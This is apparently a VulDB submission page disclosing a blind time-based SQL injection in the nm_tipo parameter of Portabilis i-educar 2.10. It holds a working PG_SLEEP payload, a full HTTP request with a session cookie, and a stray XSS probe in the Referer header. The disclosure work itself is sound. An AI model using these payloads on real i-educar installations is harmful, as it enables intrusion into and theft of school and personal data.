Enviar #631370: Portabilis i-educar 2.10 SQL Injectioninformación

TítuloPortabilis i-educar 2.10 SQL Injection
Descripción# SQL Injection (Blind Time-Based) Vulnerability in nm_tipo Parameter on educar_tipo_usuario_lst.php Endpoint --- ## Summary A SQL Injection vulnerability was identified in the `educar_tipo_usuario_lst.php` endpoint of the _i-educar_ application, specifically in the `nm_tipo` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data. --- ## Details **Vulnerable Endpoint:** `/educar_tipo_usuario_lst.php` **Parameter:** `nm_tipo` To reach the vulnerable functionality, it is necessary to navigate to: **Configurations > Permissions > User Types**. ![[Pasted image 20250809185507.png]] Additionally, exploiting this vulnerability requires an account with permissions to **create/list users and user types**. The application fails to properly validate and sanitize user input in the `nm_tipo` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays. --- ## PoC **Payload:** `'%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'EgwO'%3D'pMdZ` **Decoded Payload:** `' AND 8767=(SELECT 8767 FROM PG_SLEEP(10)) OR 'EgwO'='pMdZ` This payload triggers a **10-second delay** in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection. **Example Request:** ``` GET /intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=1'%20AND%208767%3D(SELECT%208767%20FROM%20PG_SLEEP(10))%20OR%20'EgwO'%3D'pMdZ&descricao=1&nivel=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Referer: http://localhost/intranet/educar_tipo_usuario_lst.php?busca=S&nm_tipo=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&descricao=%22%3E%3Csvg+onload%3Dalert%2812%29%3E&nivel=-1 Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i ``` ![[Pasted image 20250809183140.png]] Observe the increased server response time, confirming that the injected SQL command was executed. --- ## Impact - **Unauthorized data access:** Reading sensitive information such as credentials, personal data, or configuration details - **Database enumeration:** Extracting database schema, tables, and column details - **Data manipulation:** Adding, modifying, or deleting database records - **Denial of Service (DoS):** Using time-based queries to impact system availability - **Potential escalation to RCE:** If combined with other vulnerabilities and specific database features
Fuente⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20nm_tipo%20Parameter%20on%20educar_tipo_usuario_lst.php%20Endpoint.md
Usuario
 marceloQz (UID 87549)
Sumisión2025-08-10 00:12 (hace 11 meses)
Moderación2025-08-20 12:55 (11 days later)
EstadoAceptado
Entrada de VulDB320769 [Portabilis i-Educar hasta 2.10 Tipos de usuàrio Page educar_tipo_usuario_lst.php nm_tipo/descrição inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Interested in the pricing of exploits?

See the underground prices here!